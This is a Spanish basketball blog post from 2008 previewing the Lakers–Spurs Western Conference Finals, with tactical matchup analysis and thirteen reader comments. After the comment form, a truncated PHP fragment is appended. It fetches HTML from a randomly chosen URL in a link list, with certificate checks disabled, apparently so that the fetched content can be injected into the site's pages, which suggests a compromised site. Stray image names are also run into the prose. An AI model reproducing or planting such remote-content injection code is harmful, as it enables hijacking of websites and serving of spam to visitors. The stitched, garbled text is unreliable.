Lakers vs Spurs: tu cara me suena…

20 de May de 2008 por MagicJohnson32

tdkb1999, Spurs.

2001, Lakers.

2002, Lakers.

2003, Spurs.

2004, Lakers.

2008…

Reconozcámoslo: los echábamos de menos.

Cinco veces se enfrentaron Lakers y Spurs en Playoffs entre el 99 y el 2004 y, en todos los casos, de esos duelos salió el campeón del Oeste. Esta vez no será una excepción, ya que californianos y texanos vuelven a verse las caras en unas Finales de Conferencia que arrancarán mañana miércoles en Los Angeles (3:00 hora española).tduncanlakers

Los viejos, expertos, sabios y rocosos Spurs se encontrarán esta vez, sin embargo, con unos Lakers nuevos, jóvenes, florecientes. El informe de scouting sobre los Spurs que Phil Jackson utilizó en 2004 es válido cuatro años más tarde: pese a que han sumado algunas piezas, el juego ofensivo de los de Popovich sigue sustentándose en Tim Duncan, Manu Ginóbili y Tony Parker. Lo que más ha renovado la franquicia texana en los últimos años es su entramado defensivo. Bruce Bowen sigue siendo el referente en este sentido, y su marcaje sobre Kobe puede definir el signo de la eliminatoria. Pero la presencia de Fabricio Oberto, Kurt Thomas e Ime Udoka hacen a los Spurs un equipo más duro, más fuerte y más difícil de superar de lo que ya eran. Oberto y Thomas administrarán sus esfuerzos y faltas para frenar a Gasol, algo que dejaría a Tim Duncan sobre Lamar Odom. En esta situación, es probable que Popovich recurra a una falsa defensa zonal que permita a Duncan sellar el aro a costa de flotar a Odom, quien apenas está anotando en lanzamientos de larga distancia durante estos Playoffs. También se presenta bastante factible que los Spurs se reajusten, sitúen a Duncan sobre Gasol ybowenonkobe echen mano de Robert Horry para marcar a Odom. Por fuera, Parker estará con Derek 0.4 Fisher, Udoka será el recambio de Bowen en su asignación sobre Bryant (y como especialista en triples) y Ginóbili, con una teórica asignación sobre Radmanovic, podrá permitirse hacer continuas ayudas, tratar de recuperar balones, forzar faltas de ataque y salir rápido al contraataque.

En el otro lado de la cancha, a Gasol y Odom se les presenta la prueba más dura. Fueron capaces de superar con nota el examen de Boozer y Okur, pero Tim Duncan es para Matrícula de Honor. Gasol dará mucho espacio a Oberto (o Thomas) para ayudar a Odom, y ambos contarán también con la colaboración de Bryant, siempre y cuando éste no tenga que ocuparse del marcaje de alguno de los dos grandes referentes exteriores de SAS. Phil Jackson ha de decidir si sacrifica a Kobe en la defensa sobre Ginóbili o bien mantiene la que ha venido siendo su política habitual en estos duelos, que es dejarlo con Bowen, algo que permite al #24 cerrar líneasmanulaykers de pase, ayudar cerca del aro y mantenerse fresco para llevar el peso en ataque. La reaparición de Trevor Ariza, quien cuenta con el alta médica y ya se ha ejercitado, daría a Phil Jackson un valiosísimo recurso defensivo al margen de Bryant para defender a Ginóbili. Pero Ariza no juega un minuto desde el 17 de febrero y Jackson nunca ha sido partidario de introducir jugadores en la rotación durante los Playoffs. Ariza, sin embargo, dio motivos al Zen Master para contar con él cuando, en el entrenamiento de ayer, selló el partidillo 5 contra 5 con un espectacular mate de espaldas. Estas buenas sensaciones dejan la puerta abierta no sólo al regreso de Ariza, sino a su inclusión en el quinteto inicial por, evidentemente, Radmanovic.

La defensa sobre Parker es otro problema para los Lakers; el francés acostumbra a castigar duramente con sus penetraciones a los angelinos, que carecen de una presencia interior realmente intimidatoria. Aquellos que vieron el USA-Brasil del pasado torneo de las Americas podrían sugerir una posible solución: situar a Bryant sobre Parker, igual que aquel día se encargó de Barbosa. Problemas de faltas de Fisher, unidos a la bajísima forma en que se encuentra Farmar, pueden llevar a Jackson a recurrir a esta opción.

En cualquier caso, Lakers y Spurs prometen un espectáculo memorable. Los californianos llegan más frescos, con sólo dos derrotas en sus 10 partidos disputados en Playoffs y con cinco días de descanso desde que tomasen Salt Lake City y enviasen de vacaciones a los Jazz. Kobe ha subido las prestaciones que le convirtieron en el MVP 07-08, Gasol y Odom han mostrado ante Utah el carácter del que en ocasiones carecen, y Fisher se ha puesto el disfraz de Playoffs.

lakersbench

Los Spurs, tras deshacerse en cinco encuentros de los Suns, han sufrido lo indecible para vencer a los Hornets. Sus piernas estarán más cansadas pero su espíritu competitivo sigue siendo inalcanzable: Ellos son los campeones y ya lo han demostrado eliminando a dos magníficos equipos. Su próxima prueba consistirá en superar al mejor equipo del Oeste durante la regular-season y enfrentarse, por si no tuviesen suficiente con Kobe, Gasol y Odom, a la maldición del año par.

spursbench

Será, en definitiva, un duelo entre los equipos que se han repartido nueve de los últimos 10 títulos de Conferencia, pero también entre dos estilos de juego opuestos, entre dos de los entrenadores con un currículo más completo y entre los que en la actualidad son, posiblemente, los dos mejores jugadores del mundo.

Lakers y Spurs vuelven a verse las caras. La Batalla por el Oeste puede comenzar.

Comenta

13 comentarios a esta entrada

  1. Dantley dice:
    #1

    Has nombrado a Udoka un par de veces, estoy impresionado.

    Si no hay contratiempos, veo favoritos a los Lakers, Bryant + Gasol + Odom > Duncan + Ginobili + Parker. En el resto hay más en los Spurs, pero no creo que sea suficiente

      Citar

  2. TheDeerHunter dice:
    #2

    Todo el mundo da por supuesto que Parker se va a comer a Fisher… ¿estó porqué es con la defensa que ha hecho el crack sobre D-Williams???

      Citar

  3. Gallis dice:
    #3

    Yo, en un Lakers-Spurs, no doy nada por supuesto, jojojojo…además, creo que un duelo así no se decide por grandes actuaciones, que también, sino por los pequeños detalles.

    Socio, te falta poner un pronóstico…

      Citar

  4. xapa_croack dice:
    #4

    Pues los pequeños detalles creo que estaran en el banco, y creo k spurs es donde tiene mas profundidad. Los spurs son una version mejorada de utah.

    Estoy ansioso por ver esta eliminatoria, son dias de dormir poquisimo. Gous espurs ¡

      Citar

  5. MagicJohnson32 dice:
    #5

    Sinceramente, creo que ganaremos. Estoy contigo en que los pequeños detalles van a ser cruciales. Un buen día de Vujacic o de Barry, de Walton o de Finley, pueden valer un partido.

    Pero creo que la clave será, en buena parte, cómo cada equipo (cada entrenador) se adapte a los problemas que le cree el rival. Son equipos muy diferentes y habrá muchos desajustes. Quien sea capaz de sacar más partido de ellos en ataque y tenga más cintura para solucionarlos en defensa, ganará.

    Y la verdad es que pienso que tenemos mejor entrenador y mejores jugadores.

    4-1 Lakers.

      Citar

  6. TheDeerHunter dice:
    #6

    El mío 4-3 Lakers

      Citar

  7. Gallis dice:
    #7

    Yo, en lo que al pronóstico se refiere, tengo la misma duda que contra los Jazz….el cuarto partido. Si ganamos(y creo que lo ganaremos), coincido con mi socio, 4-1…si lo perdemos, contra Utah hubiera apostado por el 4-2, pero contra los Spurs creo que nos iríamos al séptimo…y, que dios nos coja confesados, 4-3…

      Citar

  8. TheDeerHunter dice:
    #8

    De momento vamos a ganar el primero…

      Citar

  9. xapa_croack dice:
    #9

    Bowen sobre Bryant o sobre Odom??

      Citar

  10. txusma dice:
    #10

    En Robert Horry confiamos…

      Citar

  11. Viva_Dirk dice:
    #11

    Coincido punto por punto con Magic&Gallis.

      Citar

  12. MagicJohnson32 dice:
    #12

    TP sobre Fisher, Bowen/Udoka sobre Bryant, Manu/Finley sobre el 3 de turno (Radman, Luke o Ariza, o Sasha cuando juguemos con tres guards), Duncan/Horry sobre Odom (flotando mucho) y Oberto/Kurt sobre Pau.

    Tengo más dudas y más curiosidad por ver cómo planteará Phil Jackson las asignaciones defensivas.

      Citar

  13. TheDeerHunter dice:
    #13

    Me preocupa que no se pueda implementar el Fisher-Vujacic-Kobe que tan buenos resultados ha dado.
    Los veo un pelín cogidos tácticamente hablando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>